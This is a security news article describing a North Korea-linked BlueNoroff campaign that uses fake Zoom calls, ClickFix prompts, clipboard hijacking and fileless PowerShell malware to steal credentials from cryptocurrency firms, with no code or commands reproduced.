Fake meetings fuel crypto malware raids

A fake video meeting can now be enough to breach a Web3 company, with North Korea-linked BlueNoroff hackers using bogus Zoom calls, clipboard tricks and fileless PowerShell malware to steal credentials from cryptocurrency targets across multiple countries.

The campaign marks a sharper turn in social engineering against the digital assets sector, where attackers are no longer relying only on malicious attachments or crude phishing pages. Instead, they are building convincing meeting environments, impersonating credible figures in the fintech and legal world, scheduling calls through familiar calendar tools and using stolen or AI-generated video material to lower suspicion before pushing victims into running malicious commands.

Security analysts have tied the activity with high confidence to BlueNoroff, a financially motivated subgroup of the Lazarus Group, which has long targeted cryptocurrency exchanges, blockchain start-ups, venture investors and financial technology companies. The group’s objective is clear: gain access to systems used by executives, developers and operational staff who may hold wallet credentials, session tokens, exchange access, internal documents or privileged communications.

One investigated intrusion involved a North American Web3 and cryptocurrency company. The attacker posed as a senior legal figure connected to the fintech and crypto sector and sent a Calendly invitation carrying a typosquatted Zoom link. The meeting was arranged months ahead, giving the approach the appearance of a normal business engagement rather than an urgent phishing attempt.

When the target joined the fake call, the page closely resembled a browser-based Zoom meeting. The site requested camera access and displayed what appeared to be another participant on the call. Behind the interface, the page was capable of collecting live camera footage that could later be used as bait against other victims, turning compromised professionals into unwilling props for future attacks.

The lure then moved into its decisive phase. A few seconds after the meeting began, the victim was shown a prompt claiming that a Zoom software development kit or meeting component was outdated or malfunctioning. The screen urged the user to press an “Update Now” button or follow troubleshooting steps to restore the call. This tactic belongs to a broader pattern known as ClickFix, where victims are instructed to copy and run commands under the pretence of fixing an audio, video or browser problem.

The campaign’s Windows chain is particularly dangerous because it uses PowerShell commands that can run without dropping a traditional executable file to disk. That fileless design helps the malware evade some conventional antivirus checks, while giving attackers a path to establish command-and-control access, collect browser credentials, steal Telegram session data and search for cryptocurrency wallet extensions.

A notable twist in the campaign is clipboard manipulation. Victims may believe they are copying a harmless troubleshooting command, but malicious JavaScript embedded in the fake meeting site can intercept the copy action and replace the clipboard content with attacker-controlled code. Once pasted into a terminal, the command can launch the PowerShell infection chain and give the hackers a foothold within minutes.

The operational speed of the intrusion is one of its most alarming features. In the investigated case, the sequence from clicking the meeting link to establishing remote access, harvesting credentials and setting persistence was completed in under five minutes. That narrow window leaves little room for human intervention once the victim follows the prompt.

The targeting pattern shows a global operation rather than an isolated breach. Investigators identified more than 100 additional targets whose compromised media appeared on attacker-controlled infrastructure. Victims were spread across more than 20 countries and five regions, with the United States forming the largest share, followed by Singapore and the United Kingdom. A large proportion of identified victims worked in cryptocurrency, blockchain or related finance roles, and many held senior positions such as chief executive or co-founder.

BlueNoroff’s use of fake meetings is not new, but the latest Windows-focused variant shows how the group is adapting. Earlier campaigns used fake Zoom or Microsoft Teams templates, bogus audio-error messages, malicious AppleScript on macOS, recruitment lures on Telegram, and cloned venture-capital or start-up personas. The current activity blends those methods with AI-generated profile material, stolen webcam footage and carefully staged business outreach.

The broader threat landscape is also changing. Web3 companies often operate across distributed teams, use encrypted messaging apps, depend on browser-based wallets and move quickly on investment or partnership calls. Those habits create openings for attackers who can impersonate investors, legal advisers, founders or recruiters. The same tools that make remote deal-making easier also give threat actors a route into high-value targets.

For cryptocurrency firms, the risk extends beyond a single compromised laptop. Stolen browser sessions can expose cloud dashboards, exchange accounts, wallet extensions, code repositories and internal chat platforms. Access to Telegram or other messaging accounts can help attackers impersonate the victim, approach colleagues and continue the chain of compromise. Even camera footage has become a reusable asset, allowing hackers to populate fake calls with believable faces.